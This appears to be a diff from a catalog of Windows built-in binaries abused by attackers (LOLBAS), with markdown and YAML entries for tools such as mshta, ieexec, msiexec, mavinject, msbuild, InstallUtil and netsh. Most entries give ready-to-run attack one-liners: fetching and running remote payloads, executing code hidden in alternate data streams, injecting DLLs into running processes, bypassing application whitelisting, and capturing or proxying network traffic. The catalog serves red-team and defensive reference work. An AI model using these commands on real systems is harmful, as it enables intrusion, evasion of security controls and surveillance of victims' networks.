- c:\windows\sysWOW64\findstr.exe
Code Sample: []
Detection: []
Resources:
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Oddvar Moe - @oddvarmoe

22
OSBinaries/Forfiles.exe.md Normal file
View File

@@ -0,0 +1,22 @@
## Forfiles.exe
* Functions: Execute, Read ADS
```
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.
```
* Resources:
* https://twitter.com/vector_sec/status/896049052642533376
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* C:\Windows\system32\forfiles.exe
* C:\Windows\sysWOW64\forfiles.exe
* Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe

22
OSBinaries/Forfiles.yml
View File

@@ -1,22 +0,0 @@
---
Name: Forfiles.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.'
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.'
Full Path:
- C:\Windows\system32\forfiles.exe
- C:\Windows\sysWOW64\forfiles.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/vector_sec/status/896049052642533376
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe

22
OSBinaries/Gpscript.exe.md Normal file
View File

@@ -0,0 +1,22 @@
## Gpscript.exe
* Functions: Execute
```
Gpscript /logon
Executes logon scripts configured in Group Policy.
Gpscript /startup
Executes startup scripts configured in Group Policy.
```
* Resources:
* https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
* Full path:
* c:\windows\system32\gpscript.exe
* c:\windows\sysWOW64\gpscript.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe
Requires administrative rights and modifications to local group policy settings.

22
OSBinaries/Gpscript.yml
View File

@@ -1,22 +0,0 @@
---
Name: Gpscript.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Gpscript /logon
Description: 'Executes logon scripts configured in Group Policy.'
- Command: Gpscript /startup
Description: 'Executes startup scripts configured in Group Policy.'
Full Path:
- c:\windows\system32\gpscript.exe
- c:\windows\sysWOW64\gpscript.exe
Code Sample: []
Detection: []
Resources:
- https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Notes: |
Thanks to Oddvar Moe - @oddvarmoe
Requires administrative rights and modifications to local group policy settings.

23
OSBinaries/Hh.yml
View File

@@ -1,23 +0,0 @@
---
Name: hh.exe
Description: Download, Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: HH.exe http://www.google.com
Description: Opens google's web page with HTML Help.
- Command: HH.exe C:\
Description: Opens c:\\ with HTML Help.
- Command: HH.exe c:\windows\system32\calc.exe
Description: 'Opens calc.exe with HTML Help.'
- Command: HH.exe http://some.url/script.ps1
Description: Open the target PowerShell script with HTML Help.
Full Path:
- c:\windows\system32\hh.exe
- c:\windows\sysWOW64\hh.exe
Code Sample: []
Detection: []
Resources:
- https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
Notes: Thanks to Oddvar Moe - @oddvarmoe

17
OSBinaries/IEExec.exe.md Normal file
View File

@@ -0,0 +1,17 @@
## IEExec.exe
* Functions: Execute
```
ieexec.exe http://x.x.x.x:8080/bypass.exe
Executes bypass.exe from the remote server.
```
* Resources:
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
* Full path:
* c:\windows\system32\ieexec.exe
* c:\windows\sysWOW64\ieexec.exe
* Notes: Thanks to Casey Smith - @subtee

19
OSBinaries/Ie4unit.exe.md Normal file
View File

@@ -0,0 +1,19 @@
## Ie4unit.exe
* Functions: Execute
```
ie4unit.exe -BaseSettings
Executes commands from a specially prepared ie4uinit.inf file.
```
* Resources:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
* Full path:
* c:\windows\system32\ie4unit.exe
* c:\windows\sysWOW64\ie4unit.exe
* c:\windows\system32\ieuinit.inf
* c:\windows\sysWOW64\ieuinit.inf
* Notes: Thanks to Jimmy - @bohops

20
OSBinaries/Ie4unit.yml
View File

@@ -1,20 +0,0 @@
---
Name: Ie4unit.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: ie4unit.exe -BaseSettings
Description: 'Executes commands from a specially prepared ie4uinit.inf file.'
Full Path:
- 'c:\windows\system32\ie4unit.exe '
- 'c:\windows\sysWOW64\ie4unit.exe '
- 'c:\windows\system32\ieuinit.inf '
- 'c:\windows\sysWOW64\ieuinit.inf '
Code Sample: []
Detection: []
Resources:
- https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Notes: Thanks to Jimmy - @bohops

18
OSBinaries/Ieexec.yml
View File

@@ -1,18 +0,0 @@
---
Name: IEExec.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: 'Executes bypass.exe from the remote server.'
Full Path:
- c:\windows\system32\ieexec.exe
- c:\windows\sysWOW64\ieexec.exe
Code Sample: []
Detection: []
Resources:
- https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Notes: Thanks to Casey Smith - @subtee

19
OSBinaries/InfDefaultInstall.exe.md Normal file
View File

@@ -0,0 +1,19 @@
## InfDefaultInstall.exe
* Functions: Execute
```
InfDefaultInstall.exe Infdefaultinstall.inf
Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
```
* Resources:
* https://twitter.com/KyleHanslovan/status/911997635455852544
* https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
* Full path:
* c:\windows\system32\Infdefaultinstall.exe
* c:\windows\sysWOW64\Infdefaultinstall.exe
* Notes: Thanks to Kyle Hanslovan - @kylehanslovan

20
OSBinaries/Infdefaultinstall.yml
View File

@@ -1,20 +0,0 @@
---
Name: InfDefaultInstall.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.'
Full Path:
- c:\windows\system32\Infdefaultinstall.exe
- c:\windows\sysWOW64\Infdefaultinstall.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/KyleHanslovan/status/911997635455852544
- https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
- https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
Notes: Thanks to Kyle Hanslovan - @kylehanslovan

24
OSBinaries/InstallUtil.exe.md Normal file
View File

@@ -0,0 +1,24 @@
## InstallUtil.exe
* Functions: Execute
```
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Execute the target .NET DLL or EXE.
```
* Resources:
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
* http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
* Notes: Thanks to Casey Smith - @subtee

25
OSBinaries/Installutil.yml
View File

@@ -1,25 +0,0 @@
---
Name: InstallUtil.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: 'Execute the target .NET DLL or EXE.'
Full Path:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code Sample: []
Detection: []
Resources:
- https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
- http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
- https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Notes: Thanks to Casey Smith - @subtee

23
OSBinaries/Makecab.exe.md Normal file
View File

@@ -0,0 +1,23 @@
## Makecab.exe
* Functions: Package, Add ADS, Download
```
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Compresses the target file and stores it in the target file.
makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
```
* Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
* c:\windows\system32\makecab.exe
* c:\windows\sysWOW64\makecab.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

22
OSBinaries/Makecab.yml
View File

@@ -1,22 +0,0 @@
---
Name: Makecab.exe
Description: Package, Add ADS, Download
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Description: Compresses the target file and stores it in the target file.
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Full Path:
- c:\windows\system32\makecab.exe
- c:\windows\sysWOW64\makecab.exe
Code Sample: []
Detection: []
Resources:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Oddvar Moe - @oddvarmoe

22
OSBinaries/Mavinject.exe.md Normal file
View File

@@ -0,0 +1,22 @@
## Mavinject.exe
* Functions: Execute, Read ADS
```
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Inject evil.dll into a process with PID 3110.
Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
```
* Resources:
* https://twitter.com/gN3mes1s/status/941315826107510784
* https://twitter.com/Hexcorn/status/776122138063409152
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* C:\Windows\System32\mavinject.exe
* C:\Windows\SysWOW64\mavinject.exe
* Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe

22
OSBinaries/Mavinject.yml
View File

@@ -1,22 +0,0 @@
---
Name: Mavinject.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Description: Inject evil.dll into a process with PID 3110.
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
Full Path:
- C:\Windows\System32\mavinject.exe
- C:\Windows\SysWOW64\mavinject.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/gN3mes1s/status/941315826107510784
- https://twitter.com/Hexcorn/status/776122138063409152
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe

27
OSBinaries/Msbuild.exe.md Normal file
View File

@@ -0,0 +1,27 @@
## Msbuild.exe
* Functions: Execute
```
msbuild.exe pshell.xml
Build and execute a C# project stored in the target XML file.
msbuild.exe Msbuild.csproj
Build and execute a C# project stored in the target CSPROJ file.
```
* Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
* https://github.com/Cn33liz/MSBuildShell
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
* Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis

27
OSBinaries/Msbuild.yml
View File

@@ -1,27 +0,0 @@
---
Name: Msbuild.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file.
- Command: msbuild.exe Msbuild.csproj
Description: Build and execute a C# project stored in the target CSPROJ file.
Full Path:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
Code Sample: []
Detection: []
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
- https://github.com/Cn33liz/MSBuildShell
- https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis

18
OSBinaries/Msconfig.exe.md Normal file
View File

@@ -0,0 +1,18 @@
## Msconfig.exe
* Functions: Execute
```
Msconfig.exe -5
Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
```
* Resources:
* https://twitter.com/pabraeken/status/991314564896690177
* Full path:
* c:\windows\system32\msconfig.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
See the Payloads folder for an example mscfgtlc.xml file.

19
OSBinaries/Msconfig.yml
View File

@@ -1,19 +0,0 @@
---
Name: Msconfig.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Msconfig.exe -5
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
Full Path:
- c:\windows\system32\msconfig.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/991314564896690177
Notes: |
Thanks to Pierre-Alexandre Braeken - @pabraeken
See the Payloads folder for an example mscfgtlc.xml file.

24
OSBinaries/Msdt.exe.md Normal file
View File

@@ -0,0 +1,24 @@
## Msdt.exe
* Functions: Execute
```
Open .diagcab package
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
```
* Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
* https://twitter.com/harr0ey/status/991338229952598016
* Full path:
* C:\Windows\System32\Msdt.exe
* C:\Windows\SysWOW64\Msdt.exe
* Notes: Thanks to:
See the Payloads folder for an example PCW8E57.xml file.

25
OSBinaries/Msdt.yml
View File

@@ -1,25 +0,0 @@
---
Name: Msdt.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Open .diagcab package
Description: ''
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml
/skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Full Path:
- 'C:\Windows\System32\Msdt.exe '
- 'C:\Windows\SysWOW64\Msdt.exe '
Code Sample: []
Detection: []
Resources:
- https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- https://twitter.com/harr0ey/status/991338229952598016
Notes: |
Thanks to:
See the Payloads folder for an example PCW8E57.xml file.

28
OSBinaries/Mshta.yml
View File

@@ -1,28 +0,0 @@
---
Name: mshta.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: mshta.exe evilfile.hta
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
Description: Executes VBScript supplied as a command line argument.
- Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Description: Executes JavaScript supplied as a command line argument.
- Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Full Path:
- C:\Windows\System32\mshta.exe
- C:\Windows\SysWOW64\mshta.exe
Code Sample: []
Detection: []
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe

27
OSBinaries/Msiexec.exe.md Normal file
View File

@@ -0,0 +1,27 @@
## Msiexec.exe
* Functions: Execute
```
msiexec /quiet /i cmd.msi
Installs the target .MSI file silently.
msiexec /q /i http://192.168.100.3/tmp/cmd.png
Installs the target remote & renamed .MSI file silently.
msiexec /y "C:\folder\evil.dll"
Calls DLLRegisterServer to register the target DLL.
msiexec /z "C:\folder\evil.dll"
Calls DLLRegisterServer to un-register the target DLL.
```
* Resources:
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
* https://twitter.com/PhilipTsukerman/status/992021361106268161
* Full path:
* c:\windows\system32\msiexec.exe
* c:\windows\sysWOW64\msiexec.exe
* Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman

25
OSBinaries/Msiexec.yml
View File

@@ -1,25 +0,0 @@
---
Name: Msiexec.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: msiexec /quiet /i cmd.msi
Description: Installs the target .MSI file silently.
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently.
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to register the target DLL.
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to un-register the target DLL.
Full Path:
- c:\windows\system32\msiexec.exe
- c:\windows\sysWOW64\msiexec.exe
Code Sample: []
Detection: []
Resources:
- https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
- https://twitter.com/PhilipTsukerman/status/992021361106268161
Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman

27
OSBinaries/Netsh.exe.md Normal file
View File

@@ -0,0 +1,27 @@
## Netsh.exe
* Functions: Execute, Surveillance
```
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
netsh.exe trace show status
Capture network traffic on remote file share.
netsh.exe add helper C:\Path\file.dll
Load (execute) NetSh.exe helper DLL file.
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Forward traffic from the listening address and proxy to a remote system.
```
* Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
* https://attack.mitre.org/wiki/Technique/T1128
* https://twitter.com/teemuluotio/status/990532938952527873
* Full path:
* C:\Windows\System32
* C:\Windows\SysWOW64
* Notes:

28
OSBinaries/Netsh.yml
View File

@@ -1,28 +0,0 @@
---
Name: Netsh.exe
Description: Execute, Surveillance
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: |
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
netsh.exe trace show status
Description: Capture network traffic on remote file share.
- Command: netsh.exe add helper C:\Path\file.dll
Description: Load (execute) NetSh.exe helper DLL file.
- Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Description: Forward traffic from the listening address and proxy to a remote system.
Full Path:
- C:\Windows\System32
etsh.exe
- C:\Windows\SysWOW64
etsh.exe
Code Sample: []
Detection: []
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
- https://attack.mitre.org/wiki/Technique/T1128
- https://twitter.com/teemuluotio/status/990532938952527873
Notes: ''

17
OSBinaries/Nltest.exe.md Normal file
View File

@@ -0,0 +1,17 @@
## Nltest.exe
* Functions: Credentials
```
nltest.exe /SERVER:192.168.1.10 /QUERY
```
* Resources:
* https://twitter.com/sysopfb/status/986799053668139009
* https://ss64.com/nt/nltest.html
* Full path:
* c:\windows\system32\nltest.exe
* Notes: Thanks to Sysopfb - @sysopfb

17
OSBinaries/Nltest.yml
View File

@@ -1,17 +0,0 @@
---
Name: Nltest.exe
Description: Credentials
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
Description: ''
Full Path:
- c:\windows\system32\nltest.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/sysopfb/status/986799053668139009
- https://ss64.com/nt/nltest.html
Notes: Thanks to Sysopfb - @sysopfb

22
OSBinaries/Odbcconf.yml
View File

@@ -1,22 +0,0 @@
---
Name: odbcconf.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file.
Full Path:
- 'c:\windows\system32\odbcconf.exe '
- c:\windows\sysWOW64\odbcconf.exe
Code Sample: []
Detection: []
Resources:
- https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
- https://github.com/woanware/application-restriction-bypasses
- https://twitter.com/subTee/status/789459826367606784
Notes: |
Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer
See the Playloads folder for an example .RSP file.

20
OSBinaries/Openwith.exe.md Normal file
View File

@@ -0,0 +1,20 @@
## Openwith.exe
* Functions: Execute
```
OpenWith.exe /c C:\test.hta
Opens the target file with the default application.
OpenWith.exe /c C:\testing.msi
Opens the target file with the default application.
```
* Resources:
* https://twitter.com/harr0ey/status/991670870384021504
* Full path:
* c:\windows\system32\Openwith.exe
* c:\windows\sysWOW64\Openwith.exe
* Notes: Thanks to Matt harr0ey - @harr0ey

20
OSBinaries/Openwith.yml
View File

@@ -1,20 +0,0 @@
---
Name: Openwith.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: OpenWith.exe /c C:\test.hta
Description: Opens the target file with the default application.
- Command: OpenWith.exe /c C:\testing.msi
Description: Opens the target file with the default application.
Full Path:
- c:\windows\system32\Openwith.exe
- c:\windows\sysWOW64\Openwith.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/harr0ey/status/991670870384021504
Notes: Thanks to Matt harr0ey - @harr0ey

25
OSBinaries/Pcalua.exe.md Normal file
View File

@@ -0,0 +1,25 @@
## Pcalua.exe
* Functions: Execute
```
pcalua.exe -a calc.exe
Open the target .EXE using the Program Compatibility Assistant.
pcalua.exe -a \\server\payload.dll
Open the target .DLL file with the Program Compatibilty Assistant.
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Open the target .CPL file with the Program Compatibility Assistant.
```
* Resources:
* https://twitter.com/KyleHanslovan/status/912659279806640128
* Full path:
* c:\windows\system32\pcalua.exe
* Notes: Thanks to:
fab - @0rbz_
Kyle Hanslovan - @KyleHanslovan

24
OSBinaries/Pcalua.yml
View File

@@ -1,24 +0,0 @@
---
Name: Pcalua.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: pcalua.exe -a calc.exe
Description: Open the target .EXE using the Program Compatibility Assistant.
- Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant.
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Full Path:
- c:\windows\system32\pcalua.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/KyleHanslovan/status/912659279806640128
Notes: |
Thanks to:
fab - @0rbz_
Kyle Hanslovan - @KyleHanslovan

16
OSBinaries/Pcwrun.exe.md Normal file
View File

@@ -0,0 +1,16 @@
## Pcwrun.exe
* Functions: Execute
```
Pcwrun.exe c:\temp\beacon.exe
Open the target .EXE file with the Program Compatibility Wizard.
```
* Resources:
* https://twitter.com/pabraeken/status/991335019833708544
* Full path:
* c:\windows\system32\pcwrun.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

17
OSBinaries/Pcwrun.yml
View File

@@ -1,17 +0,0 @@
---
Name: Pcwrun.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Pcwrun.exe c:\temp\beacon.exe
Description: Open the target .EXE file with the Program Compatibility Wizard.
Full Path:
- c:\windows\system32\pcwrun.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/991335019833708544
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

17
OSBinaries/Powershell.exe.md Normal file
View File

@@ -0,0 +1,17 @@
## Powershell.exe
* Functions: Execute, Read ADS
```
powershell -ep bypass - < c:\temp:ttt
Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
```
* Resources:
* https://twitter.com/Moriarty_Meng/status/984380793383370752
* Full path:
* C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
* C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
* Notes: Thanks to Moriarty - @Moriarty_Meng

18
OSBinaries/Powershell.yml
View File

@@ -1,18 +0,0 @@
---
Name: Powershell.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: powershell -ep bypass - < c:\temp:ttt
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
Full Path:
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
Notes: Thanks to Moriarty - @Moriarty_Meng

18
OSBinaries/PresentationHost.exe.md Normal file
View File

@@ -0,0 +1,18 @@
## PresentationHost.exe
* Functions: Execute
```
Presentationhost.exe C:\temp\Evil.xbap
Executes the target XAML Browser Application (XBAP) file.
```
* Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
* Full path:
* c:\windows\system32\PresentationHost.exe
* c:\windows\sysWOW64\PresentationHost.exe
* Notes: Thanks to Casey Smith - @subtee

19
OSBinaries/Presentationhost.yml
View File

@@ -1,19 +0,0 @@
---
Name: PresentationHost.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap
